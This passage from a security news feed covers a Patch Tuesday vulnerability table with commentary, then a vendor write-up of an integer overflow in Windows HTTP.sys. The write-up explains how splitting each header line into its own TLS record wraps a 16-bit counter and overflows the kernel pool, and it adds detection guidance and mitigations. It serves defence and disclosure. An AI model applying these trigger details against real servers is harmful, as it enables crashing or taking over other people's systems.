  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50508"><span>CVE-2026-50508</span></a></td>
  <td width="256" class="xl68">Windows NTLM Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48565"><span>CVE-2026-48565</span></a></td>
  <td width="256" class="xl68">Windows Narrator
  Braille Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44805"><span>CVE-2026-44805</span></a></td>
  <td width="256" class="xl68">Windows Network
  Controller (NC) Host Agent Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42981"><span>CVE-2026-42981</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42974"><span>CVE-2026-42974</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45487"><span>CVE-2026-45487</span></a></td>
  <td width="256" class="xl68">Windows Program
  Compatibility Assistant Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42828"><span>CVE-2026-42828</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42837"><span>CVE-2026-42837</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42969"><span>CVE-2026-42969</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42971"><span>CVE-2026-42971</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42970"><span>CVE-2026-42970</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42973"><span>CVE-2026-42973</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42978"><span>CVE-2026-42978</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42977"><span>CVE-2026-42977</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42979"><span>CVE-2026-42979</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42991"><span>CVE-2026-42991</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45639"><span>CVE-2026-45639</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42908"><span>CVE-2026-42908</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45593"><span>CVE-2026-45593</span></a></td>
  <td width="256" class="xl68">Windows SDK Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42906"><span>CVE-2026-42906</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42907"><span>CVE-2026-42907</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47648"><span>CVE-2026-47648</span></a></td>
  <td width="256" class="xl68">Windows Storage
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42915"><span>CVE-2026-42915</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP Denial
  of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42904"><span>CVE-2026-42904</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42968"><span>CVE-2026-42968</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42912"><span>CVE-2026-42912</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45597"><span>CVE-2026-45597</span></a></td>
  <td width="256" class="xl68">Windows UI Automation
  Manager (uiamanager.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45599"><span>CVE-2026-45599</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45635"><span>CVE-2026-45635</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40409"><span>CVE-2026-40409</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40404"><span>CVE-2026-40404</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42989"><span>CVE-2026-42989</span></a></td>
  <td width="256" class="xl68">Winlogon
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="144"></td>
  <td width="256"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Looking at the other Critical-rated bugs in this release, the scariest-looking one is actually nothing to concern yourself with at all. The CVSS 10 bug in Azure HorizonDB has already been addressed by Microsoft and is just being documented now. That’s also the case for five others. Of course, there wouldn’t be a release without Office bugs that have the Preview Pane as an attack vector. There are multiple in June. There’s a handful of bugs in the Remote Desktop Client, but these rely on connecting to a malicious RDP server. There are three patches for Hyper-V that allow for guest-to-host code execution. The bug in Active Directory requires authentication, but any authenticated user can hit it. For the Windows Directory Service vulnerability, it needs to be listening for TFTP. You have blocked that everywhere, right? The bug in Azure Network Adapter is somewhat unique as you need to update your Linux kernel to be protected. The bug in Azure Kubernetes allows an attacker to break out of a container and gain control of the AKS worker node. Finally, the bug in the Kerberos Key Distribution Center (KDC) seems unlikely, but if exploited, it could allow authenticated attackers to get code execution on affected systems.</p><p class="">Moving on to the other code execution bugs, there are the ubiquitous open-an-own bugs in Office components like Excel and Word. The code injection bug in Exchange Server looks troubling, but it requires a machine-in-the-middle (MiTM), so exploitation is unlikely. The bugs in SharePoint require authentication, but you should note that the patch applies to both SharePoint Server 2016 and SharePoint Enterprise Server 2016. The two bugs in UPnP are interesting. Both can lead to code execution by causing an error during the handling of specially crafted data, which could lead to a Use After Free (UAF) bug. The bugs in RDP Client all require connecting to a malicious RDP server, but it’s not clear why some are rated Critical and some are rated Important. The NTFS vulnerability requires a user to mount a virtual hard drive on an affected system. The last RCE bug this month is in Azure Stack Edge and requires the attacker to send a specially crafted file upload request that includes a manipulated file name or path, leading to code execution.</p><p class="">There are more than 60 Elevation of Privilege (EoP) bugs in this month’s release, and as usual, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. A notable exception is in Exchange Server, where a user on Outlook Web Access (OWA) could gain access to other mailboxes. The bug in Visual Studio Code could allow attackers to gain permissions associated with the MCP Server’s managed identity. The bugs in Windows SDK and Windows UI Automation Manager could let attacker go from low integrity up to medium integrity code execution. The bug in Bluetooth just allows “elevated” privileges without really describing what elevated might be. </p><p class="">Moving on to the more than 20 security feature bypass (SFB) bugs in the June release, there are a total of 10 that impact Secure Boot. All carry scope change (S:C) in the CVSS, meaning successful exploitation affects security boundaries beyond the vulnerable component itself — specifically the ability to load untrusted code at boot, bypass Virtual Secure Mode, and undermine boot integrity guarantees. CVE-2026-45654 explicitly calls out VSM exposure. The bulk of these are credited to Alon Leviev (STORM), which is notable given his prior BootKitty/BlackLotus-adjacent research. The bugs in the Windows Boot Manager have a similar impact as the Secure Boot bugs. The UEFI Secure Boot vulnerabilities go a layer deeper. They require either local admin or physical access but could allow for the running of untrusted code even before the OS loads. Rootkits anyone? The four bugs in BitLocker all require physical access but could yield encrypted data if exploited. The bug in Windows Administration Protection allows attackers to bypass the feature that prevents standard-user apps from performing admin-level actions. The bug in Visual Studio Copilot Chat could be the most interesting non-boot bug here as it allows authentication impersonation. Mark of the Web (MotW) and Excel vulns could bypass user warnings. Lastly, the bug in PC Manager bypasses expected user controls. </p><p class="">Turning our attention to the mass of spoofing bugs in the release, we instantly see 18 impacting SharePoint Server. Fortunately, these are simply cross-site scripting (XSS) bugs. It’s the Exchange bugs we should really watch for. One is an XSS that an attacker can exploit by convincing an Exchange administrator to open a malicious link or message, which then runs code in the admin's web session. That's a meaningful privilege escalation path. Another is listed as an SSRF-based attack, but no other details are available. The last is a lower-impact XSS with limited confidentiality/integrity loss. The bug in Bing Search (remember Bing?) is a classic search result spoofing. The bug in Azure Stack Edge is interesting as it could allow access to resources outside the vulnerable component's security boundary. The bug in Office for Android requires user interaction. The Office Project Server bug is an authenticated XSS with low impact. The final spoofing bug is in Azure Attestation but has already been addressed. You should still verify you are protected by following the instructions in the write-up from Microsoft.</p><p class="">There are 30 different information disclosure bugs in this release, and fortunately, the vast majority of these simply result in info leaks consisting of unspecified memory contents or memory addresses. The two bugs in Visual Studio require user interaction and could “disclose information over a network.” How obtuse. The bug in GitHub Copilot and Visual Studio Code could disclose discloses a sign-in access token for a user's work account. That's a meaningful credential exposure, not just random memory. That leaves the two bugs in Exchange Server. One could allow an authenticated user to gain information about which network services that the Exchange server can reach. The other sounds much like the spoofing bug in OWA as it allows attackers to see information in mailboxes they should not have access to.</p><p class="">I’ve never been a fan of the “tampering” category, as it could mean so many different things. For example, the bug in .NET simply says it could allow an unauthorized attacker to perform tampering locally. Similarly, the bug in Visual Studio says the same, expect here the tampering occurs over a network. Microsoft doesn’t even bother with a CWE for the tampering bug in the DHCP Server, so your guess is as good as mine.</p><p class="">There are seven DoS bugs in the June release, and as usual, Microsoft provides little to no actionable information about the vulnerabilities. The most interesting is the bug in HTTP.sys, which is listed as publicly known. This is an uncontrolled resource consumption, rated "Exploitation More Likely," and publicly disclosed. Since, HTTP.sys sits at the core of IIS and Windows web services, a network-accessible DoS here can take down any Windows server running HTTP-based services. Based on the Acknowledgement, it looks like this bug may have been found using AI. There are no real details for the other bugs, but based simply on the impact, I would focus on the Kerberos and TCP/IP bugs if you had to prioritize.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">The next Patch Tuesday will be on July 14 and will be the last one before Black Hat/DEFCON. It’s usually a big release, so strap in and hang on. I’ll be back then to give you my full thoughts. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p><p class=""> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47291: Remote Code Execution in the Windows HTTP.sys]]></title>
<description><![CDATA[In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service co...]]></description>
<link>https://tsecurity.de/de/3694561/hacking/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694561/hacking/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges. The following is a portion of their write-up covering CVE-2026-47291, with a few minimal modifications.</em></p>





















  
  




  



  <hr>
  
    
    



  




  <p class="">A remote code execution vulnerability exists in the HTTP Protocol Stack for Microsoft Internet Information Services implemented in HTTP.sys. The vulnerability is due to invalid validating incoming HTTP requests. </p><p class="">A remote, unauthenticated attacker can exploit this vulnerability by sending crafted HTTP packets to the target system. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges.</p><p class=""><strong>The Vulnerability</strong></p><p class=""><em>HTTP.sys</em> is the kernel-mode HTTP protocol driver in Microsoft Windows. It provides HTTP request parsing, response caching, and SSL/TLS termination for Internet Information Services (IIS) and other applications that register URL prefixes. The driver listens on configured TCP ports (commonly 80 for HTTP and 443 for HTTPS) and processes inbound HTTP/1.x and HTTP/2 requests at the kernel level.</p><p class="">When operating over HTTPS, <em>HTTP.sys</em> delegates TLS processing to the Windows Secure Channel (SChannel) provider. Inbound TCP data is decrypted on a <a href="https://www.rfc-editor.org/info/rfc8446/">per-record basis</a>: each TLS record constitutes an independent unit of encryption and is decrypted separately by SChannel before being delivered to <em>HTTP.sys</em> as a distinct plaintext buffer. A single TLS 1.3 application data record has the following structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class="">The decrypted payload of each TLS record is delivered independently to the HTTP parser via</p><p class=""><em>UlHttpBufferReceiveEvent()</em>, regardless of how many TLS records the underlying TCP connection coalesces into a single TCP segment. This behavior is distinct from plaintext HTTP connections, where the Windows TCP stack coalesces multiple segments into a single receive indication before the data reaches <em>HTTP.sys</em>.</p><p class="">The HTTP parser maintains a per-request state object that includes a dynamically grown buffer reference array. The <em>capacity</em> field stores the current number of allocated slots in the buffer reference array. The <em>count</em> field stores the number of slots currently in use. The <em>ref_array_ptr</em> field points to the dynamically allocated array of 8-byte buffer reference entries.</p><p class="">An integer overflow vulnerability exists in <em>HTTP.sys</em>. The vulnerability is due to insufficient bounds checking when growing a buffer reference array during HTTP/1.x header parsing. When <em>HTTP.sys</em> receives data for an HTTP/1.x request, it allocates a <em>UL_REQUEST_BUFFER</em> structure for each receive indication and tracks these buffers in the per-request reference array described above. The <em>count</em> field records the number of active buffer references, and the <em>capacity</em> field records the total number of allocated slots. </p><p class="">As the HTTP parser (<em>UlpParseNextRequest()</em>) processes header lines, it calls an inline buffer reference routine each time a new receive buffer is consumed. When <em>count</em> reaches <em>capacity</em>, the routine grows the array by reallocating it with five additional slots. The new allocation size is computed as 0x28 + <em>capacity</em> * 8, the contents of the existing array are copied via <em>memmove</em> using <em>count</em> * 8 as the copy length, and <em>capacity</em> is incremented by 5 as a 16-bit unsigned integer addition. No overflow check is performed on this addition.</p><p class="">After 13,107 growth events, <em>capacity</em> reaches 0xFFFB. The next growth adds 5, producing 0x10000, which truncates to 0x0000 in the 16-bit field. On the subsequent buffer reference addition, <em>count</em> (which is now 65,536 or greater) exceeds the zero <em>capacity</em>, triggering another growth. The allocation size computation 0x28 + 0 * 8 produces a 40-byte allocation, but the <em>memmove</em> copies <em>count</em> * 8 bytes (approximately 524,256 bytes) from the old buffer into the 40-byte allocation. This results in a kernel pool heap buffer overflow of over 500 kilobytes.</p><p class="">Each buffer reference corresponds to one receive buffer delivered to the HTTP parser. For plaintext HTTP connections, the Windows TCP stack coalesces received segments into large indications, and <em>UlpMergeBuffers() </em>further combines buffers within <em>HTTP.sys</em>. Over TLS connections, each TLS record is decrypted independently by SChannel and delivered as a separate buffer through <em>UlHttpBufferReceiveEvent()</em> into <em>UlpCopyIndicatedData()</em>. If each TLS record contains exactly one complete header line (terminated by CRLF), the HTTP parser fully consumes the buffer without setting the partial-parse flag, causing <em>UlpAdjustBuffers()</em> to advance to the next buffer via its non-merge path. This creates a 1:1 correspondence between TLS records sent and buffer references accumulated.</p><p class="">To trigger the overflow, an attacker crafts an HTTP request in which each header line is encapsulated in a separate TLS application data record. Given a minimum header line size of approximately 4 bytes and a required count of 65,536 buffer references, the total request size comes to roughly 262,144 bytes. The <em>MaxRequestBytes </em>registry value (at <em>HKLM\SYSTEM\CurrentControlSet\Services\HTTP\Parameters</em>) must be configured to a value of at least 262,144 bytes for the server to accept a request of this size. The default value of 16,384 bytes limits the request to approximately 4000 header lines, which is insufficient to trigger the overflow. As a mitigation, keeping <em>MaxRequestBytes</em> at or below 65,535 bytes represents the most conservative configuration to prevent this attack.</p><p class="">A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HTTP/1.x request over a TLS connection to an affected server. Successful exploitation results in unexpected system termination due to a memory access exception in the context of the kernel. Under specific memory layout conditions, exploitation could result in arbitrary code execution in the context of the kernel.</p><p class=""><strong>Notes:</strong></p><p class="">• The vulnerability is only reachable through HTTP/1.x header parsing over TLS connections. HTTP/2 and HTTP/3 use different parser paths that do not interact with the buffer reference array.</p><p class="">• Body data parsing (Content-Length or chunked transfer encoding) does not add entries to the buffer reference array. Only header parsing triggers buffer reference growth.</p><p class="">• At a sending rate of 10 milliseconds per TLS record, the overflow requires approximately 11 minutes to trigger.</p><p class=""><strong>Source Code Walkthrough</strong></p><p class="">The following code snippet was taken from <em>HTTP.sys</em> version 10.0.26100.7705. Comments added by TrendAI Research have been highlighted.</p><p class="">In <em>UlpParseNextRequest()</em>:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class=""><strong>Detection Guidance</strong></p><p class="">To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the TCP port 443.</p><p class="">The traffic on the affected port(s) is TLS-encrypted. The detection device must be able to decrypt the TLS traffic before applying the following detection method. The detection device should monitor for HTTPS connections.</p><p class="">An HTTP/1.x request [1] consists of a request line followed by zero or more header field lines, each terminated by CRLF. The following grammar defines the relevant structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class=""><em>Decrypted traffic inspection:</em></p><p class="">After decrypting the TLS session, the detection device must parse the HTTP/1.x request headers. The detection device must count the number of distinct header field lines present in a single HTTP request. If the number of header field lines in a single request exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Encrypted traffic heuristics:</em></p><p class="">Where decryption is not available, the detection device should inspect the pattern of TLS application data records within the encrypted session. If each TLS application data record contains a single short payload and the total number of such records on a single connection exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Notes:</em></p><p class="">• The preferred detection method (header line count) requires the ability to decrypt TLS traffic, for example through TLS inspection, a decrypting proxy, or possession of the server's private key. This method directly observes the attack indicator and produces low false-positive and false-negative rates.</p><p class="">• The TLS record heuristic operates on encrypted traffic and does not require decryption. This method is more prone to false positives (legitimate applications that send many small TLS records, such as interactive streaming sessions, may trigger the heuristic) and to false negatives (the threshold is based on observable record sizes rather than the actual header count that determines exploitability). Where possible, decrypted traffic inspection should be preferred.</p><p class="">• The attack requires approximately 11 minutes of sustained connection to accumulate sufficient header lines. Connection duration monitoring may serve as a supplementary detection heuristic.</p><p class=""><strong>Conclusion</strong></p><p class="">This vulnerability was <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291">patched</a> by Microsoft in the June 2026 release cycle. They note several mitigations that include editing the registry to ensure unpatched systems are not vulnerable to exploitation. However, the best method to ensure this bug has been fully remediated is to test and deploy the vendor-supplied patch.</p><p class="">Special thanks to Yazhi Wang and Jonathan Lein of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services, please visit <a href="https://go.trendmicro.com/tis/vulnerabilities.html">https://go.trendmicro.com/tis/vulnerabilities.html</a>.</p><p class="">The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 endpoint blind spots your EDR/XDR was never built to see]]></title>
<description><![CDATA[In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.



That was enough. Over 86,000 downloads. Malicious code in PhantomRaven, packages running in the production systems of Fort...]]></description>
<link>https://tsecurity.de/de/3694387/it-security-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694387/it-security-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
